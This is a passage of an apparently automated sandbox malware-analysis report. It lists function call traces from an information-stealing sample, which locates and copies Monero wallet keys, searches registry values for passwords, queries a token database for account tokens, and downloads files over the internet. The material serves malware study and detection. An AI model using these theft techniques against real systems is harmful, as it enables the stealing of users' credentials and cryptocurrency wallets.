                  • lstrcat.KERNEL32(00000000,00000000), ref: 009344D2
                  • lstrcat.KERNEL32(00000000,?), ref: 009344E5
                  • lstrcat.KERNEL32(00000000,00940FB8), ref: 009344F4
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 2b35810416edf9ba1e8179e89fe7c943d37310d05e0fdc69f09707fe1091a317
                  • Instruction ID: 35c2ede3c1b4c82ef15a170e5134e92e6b8132b374222c304583fe3a5be8f32f
                  • Opcode Fuzzy Hash: 2b35810416edf9ba1e8179e89fe7c943d37310d05e0fdc69f09707fe1091a317
                  • Instruction Fuzzy Hash: E97134B6900218ABCF14EBA0DC85FEE777DAB88300F044598F605A7181EE75EB45CFA1
                  Function 00921310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
                    • Part of subcall function 009212A0: RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
                    • Part of subcall function 009212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009212D7
                    • Part of subcall function 009212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
                    • Part of subcall function 009212A0: RegCloseKey.ADVAPI32(?), ref: 009212FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0092134F
                  • lstrlen.KERNEL32(?), ref: 0092135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00921377
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00921465
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 009214EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 6a07b718d5e74076417b3b402d6ef634215e1908b3c57b9dc7150259a07ea4ef
                  • Instruction ID: 3dfc3f925c5e8ab6868ff94c3daeeaf607e74e55406001be7007991881036984
                  • Opcode Fuzzy Hash: 6a07b718d5e74076417b3b402d6ef634215e1908b3c57b9dc7150259a07ea4ef
                  • Instruction Fuzzy Hash: 4E5123B1D5011957CB15FB60DD92FEE737CAF94300F404198B64AA2091EE746B89CFA6
                  Function 009275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009272D0: memset.MSVCRT ref: 00927314
                    • Part of subcall function 009272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0092733A
                    • Part of subcall function 009272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
                    • Part of subcall function 009272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
                    • Part of subcall function 009272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
                    • Part of subcall function 009272D0: HeapFree.KERNEL32(00000000), ref: 00927459
                  • lstrcat.KERNEL32(00000000,009417FC), ref: 00927606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00927648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0092765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0092768F
                  • lstrcat.KERNEL32(00000000,00941804), ref: 009276A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009276D3
                  • lstrcat.KERNEL32(00000000,00941808), ref: 009276ED
                  • task.LIBCPMTD ref: 009276FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
                  • Instruction ID: 07aa1f3872dc9d0d4db247de71d11f079a3960edae21e423330d69a5a9ba0635
                  • Opcode Fuzzy Hash: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
                  • Instruction Fuzzy Hash: 5A316972901109EBCF04EBE4EC86EEFB778AB85305B104418E102B72A5DE78A946CF52
                  Function 009272D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00927314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0092733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
                  • HeapFree.KERNEL32(00000000), ref: 00927459
                  • task.LIBCPMTD ref: 00927555
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
                  • Instruction ID: e6de044b75732f80be57a5abcaf35accde1823a0a9199a8c647e3112b93b97f8
                  • Opcode Fuzzy Hash: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
                  • Instruction Fuzzy Hash: 4B612CB59041689BDB24DB50DC51FDAB7B8BF84300F0081E9E649A6185DFB45FC9CF90
                  Function 00938100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0105E1C8,00000000,?,00940E2C,00000000,?,00000000), ref: 00938130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00938158
                  • __aulldiv.LIBCMT ref: 00938172
                  • __aulldiv.LIBCMT ref: 00938180
                  • wsprintfA.USER32 ref: 009381AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
                  • Instruction ID: 8b4e4b41c0da2525c338534038c1e5f4824a8b57366463d143b406f799177038
                  • Opcode Fuzzy Hash: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
                  • Instruction Fuzzy Hash: DA21C9B1A44218ABDB00DFD4DD49FAFB7B8EB44B14F104519F605BB2C0DBB869018FA5
                  Function 009260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                  • InternetOpenA.WININET(00940DF7,00000001,00000000,00000000,00000000), ref: 0092610F
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00926147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0092618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009261B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 009261DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0092620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00926249
                  • InternetCloseHandle.WININET(?), ref: 00926253
                  • InternetCloseHandle.WININET(00000000), ref: 00926260
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: ff0afb06a4e0d7e009de47988838f1f825bc97562eec201e82256e2633586f36
                  • Instruction ID: 409a663e3c9ec6c5dc32323ed19ec11e197677971d1b6925dc72451291623d13
                  • Opcode Fuzzy Hash: ff0afb06a4e0d7e009de47988838f1f825bc97562eec201e82256e2633586f36
                  • Instruction Fuzzy Hash: 79512CB1900218ABDF20DF60DC45BEE77B8EB44705F108498E605A71C5DBB8AA89CF95
                  Function 0092BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0092BC9F
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0092BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0092BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0092BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 246ffa782e3a6d44ad351c58d272350dc9862e9ba419a5916e117776d56b2bdc
                  • Instruction ID: d289ed3fe18740d39d9b48b48a81d76e40b0a0d4542696b51146bb55f7c06e39
                  • Opcode Fuzzy Hash: 246ffa782e3a6d44ad351c58d272350dc9862e9ba419a5916e117776d56b2bdc
                  • Instruction Fuzzy Hash: B9B12972910108ABDF04EBA0DD96FEE7379AF94300F404568F546B7092EF746A49CFA6
                  Function 00936770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
                  • Instruction ID: b5270eb988d7d2190e9b057b27eb06e4852f0e4bf39c2dbc313daf78d0122d7a
                  • Opcode Fuzzy Hash: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
                  • Instruction Fuzzy Hash: 13F05E30908209EFDB449FE0E90973C7B70FB04703F044198E60AA72D0DAB85F419F96
                  Function 00924FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00924FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00924FD1
                  • InternetOpenA.WININET(00940DDF,00000000,00000000,00000000,00000000), ref: 00924FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00925011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00925041
                  • InternetCloseHandle.WININET(?), ref: 009250B9
                  • InternetCloseHandle.WININET(?), ref: 009250C6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 812bbeb03f9cd527e3312c4ad14048cd60c6c5f19410beb2601ccdf5360d65dd
